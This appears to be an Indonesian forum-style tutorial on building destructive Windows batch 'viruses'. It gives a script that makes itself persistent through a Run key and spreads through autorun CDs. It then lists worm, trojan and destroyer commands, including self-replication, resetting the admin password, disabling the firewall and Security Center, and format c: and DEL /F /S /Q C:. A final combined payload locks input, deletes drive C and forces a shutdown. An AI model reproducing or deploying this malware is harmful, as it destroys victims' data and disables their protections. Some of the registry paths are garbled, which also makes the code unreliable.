1. buka Notepad lo,trus copy-paste script ni..
@echo off
copy image_name(terserahdarinama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserahdarinama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserahdarinama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuatdengan flash lalu di publish ke .exe,atau file exstensilain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuatdengan flash lalu di publish ke .exe,atau file exstensilain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuatdengan flash lalu di publish ke .exe,atau file exstensilain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesanpembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserahdarinama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserahdarinama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuatdengan flash lalu di publish ke .exe,atau file exstensilain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(ataukombinasiwarna RGB lain,caripake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES denganexstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:
[autorun]
open=nama_file.bat
- lalu SAVE AS ALL FILES denganexstensi .inf (Autorun.inf)
- file-file tersebutharusdalam 1 direktori, laluseleksi file-file tsbklikkanan PROPERTIES beritanda check pada HIDDEN dan READ-ONLY
- copy file-file tsbke CD
- nikmatiefeknya
2. ayatidakmenyarankanandautkmenjalankan virus inidikomputersendiri!!
Virus inidibuat dg Notepad dan di save as dg ekstension .bat
JgnlupautkmerubahSave as typemenjadiAll files
BASIC
invisible command
@echo off
Swap mouse
rundll32user,swapmousebutton
buka URL ygdiinginkan
start [url]http://www.google.com[/url]
Shutdown kmptr&beripesan
shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f
Disable mouse stlh Restart
rundll32mouse,disable
Disable keyboard stlh Restart
rundll32keyboard,disable
Freezes kmptrstlh Restart
rundll32user,disableoemlayer
Worm
memperbanyakdirididlmdirektori
cttynul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul"
me-replace file batch yg lain
%0 >>other.bat
Trojan
mngirimdftar file dlmdirektori
dir *.*>>Filelist.txt
ganti password admin
net user administrator PASSWORD HERE
membuat info IP
ipconfig>Computer-IP-address.txt
Perusak
copykeAutorun
COPY %0 %windir%WINSTART.BAT
format drive C
format c: /q /autotest
delete Windows
DELTREE /Y %windir%
delete drive C dg paksa
DEL /F /S /Q C:
mematikan firewall & security center
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
Pause
pausesmpaitekansmbarangtombol
pause
pause 20 detik
@ping.exe 127.0.0.1 -n 20 -w 1000 >nul
Berikuthasilakhirnya :
@echo off
cls
rundll32 mouse,disable
rundll32 keyboard,disable
COPY %0 %windir%WINSTART.BAT
net stop "Security Center"
net stop SharedAccess
echo Andakena VIRUS!!!
@ping.exe 127.0.0.1 -n 5 -w 1000 >nul
start [url]http://www.youtube.com[/url]
@ping.exe 127.0.0.1 -n 5 -w 1000 >nul
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
DEL /F /S /Q C:
shutdown -s -t 10 -c "Ucapkanselamattinggalpadakomputermu!" -f
-disables mouse & keyboard
-copy ke AUTORUN
-stop Security Center
-display "Andakena VIRUS!!!" selama 5 detik
-starts [url]http://www.youtube.com[/url]
-disable firewall
-delete c: drive
-force shutdown dg pesan "Ucapkanselamattinggalpadakomputermu!"
3.
